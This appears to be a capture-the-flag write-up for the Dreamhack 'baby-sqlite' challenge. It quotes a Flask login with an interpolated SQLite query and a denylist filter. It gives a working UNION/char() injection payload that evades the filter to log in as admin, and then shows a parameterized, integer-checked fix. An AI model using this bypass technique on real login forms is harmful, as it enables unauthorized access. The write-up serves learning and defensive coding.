개발세발보안중
baby-sqlite
https://dreamhack.io/wargame/challenges/1
```python
with app.app_context():
    conn = get_db()
    # user input is interpolated straight into the SQL text
    query = f"SELECT uid FROM users WHERE uid='{uid}' and upw='{upw}' and level={level};"
    try:
        req = conn.execute(query)
        result = req.fetchone()
        if result is not None:
            uid = result[0]
            if uid == 'admin':
                return FLAG
    except:
        return 'Error!'
    return 'Good!'
```
If the first row returned by the query has uid `admin`, the flag is returned.
```python
@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    uid = request.form.get('uid', '').lower()
    upw = request.form.get('upw', '').lower()
    level = request.form.get('level', '9').lower()
    # denylist applied to every field after lowercasing
    sqli_filter = ['[', ']', ',', 'admin', 'select', '\'', '"', '\t', '\n', '\r', '\x08', '\x09', '\x00', '\x0b', '\x0d', ' ']
    for x in sqli_filter:
        if uid.find(x) != -1:
            return 'No Hack!'
        if upw.find(x) != -1:
            return 'No Hack!'
        if level.find(x) != -1:
            return 'No Hack!'
```
All three inputs are converted to lowercase and then checked against the filter list.
`level` defaults to 9.
The login page only has input boxes for uid and upw, so I add a `level` box by inserting HTML (`<input type="submint"/>`) into the page.
The query we want to end up with is the following; its quotes and spaces are blocked by the filter, so the payload below has to express the same thing without them:

```sql
SELECT uid FROM users WHERE uid='a' and upw='a' and level=9 union values('admin');
```

Enter the following in the level field (`/**/` stands in for the filtered space, and `char(...)||...` builds the string `admin` without quotes or the filtered word itself):

```
9/**/union/**/values(char(0x61)||char(0x64)||char(0x6d)||char(0x69)||char(0x6e))
```
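As an added example that is not code from the challenge or from this writeup, the string-built query above is placed beside a parameterized version of the same lookup, run against a constructed in-memory SQLite table (the `users` schema, the sample rows and the function names are assumptions). It shows why a denylist plus lowercasing is not a defence: the bound-parameter query treats the whole `level` value as data, and parsing `level` as an integer up front rejects anything that is not a plain number.

```python
import sqlite3

# Constructed fixture standing in for the challenge's users table.
# Assumed schema: uid TEXT, upw TEXT, level INTEGER (not taken from the challenge).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, upw TEXT, level INTEGER)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-admin-pw', 0)")
    conn.execute("INSERT INTO users VALUES ('guest', 'guest', 9)")
    return conn


def login_vulnerable(conn, uid, upw, level):
    """Mirror of the challenge's query construction: the three inputs are
    pasted into the SQL text, so the statement itself is attacker-controlled
    and the denylist is the only thing standing between input and parser."""
    query = f"SELECT uid FROM users WHERE uid='{uid}' and upw='{upw}' and level={level};"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, uid, upw, level):
    """Same lookup with parameter binding. The SQL text is a constant; the
    driver hands the values to SQLite separately, so comment sequences,
    UNION or char() in the input are just bytes being compared to columns.
    level is additionally validated as an integer before it is ever used."""
    try:
        level_int = int(level)
    except (TypeError, ValueError):
        return None  # reject non-numeric level instead of interpolating it
    row = conn.execute(
        "SELECT uid FROM users WHERE uid = ? AND upw = ? AND level = ?",
        (uid, upw, level_int),
    ).fetchone()
    return row[0] if row else None


# The writeup's payload, passed through the same lowercasing the app applies.
PAYLOAD = "9/**/union/**/values(char(0x61)||char(0x64)||char(0x6d)||char(0x69)||char(0x6e))".lower()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "a", "a", PAYLOAD))   # admin row surfaces via UNION
    print("hardened:  ", login_hardened(db, "a", "a", PAYLOAD))     # None: rejected before the query
    print("hardened:  ", login_hardened(db, "guest", "guest", "9"))  # guest: normal login still works
```

The integer check is the part that fixes the `level=...` position in particular, since an unquoted numeric slot cannot be protected by escaping quotes; binding with `?` is what fixes the two quoted slots, and together they make the filter list unnecessary rather than merely longer.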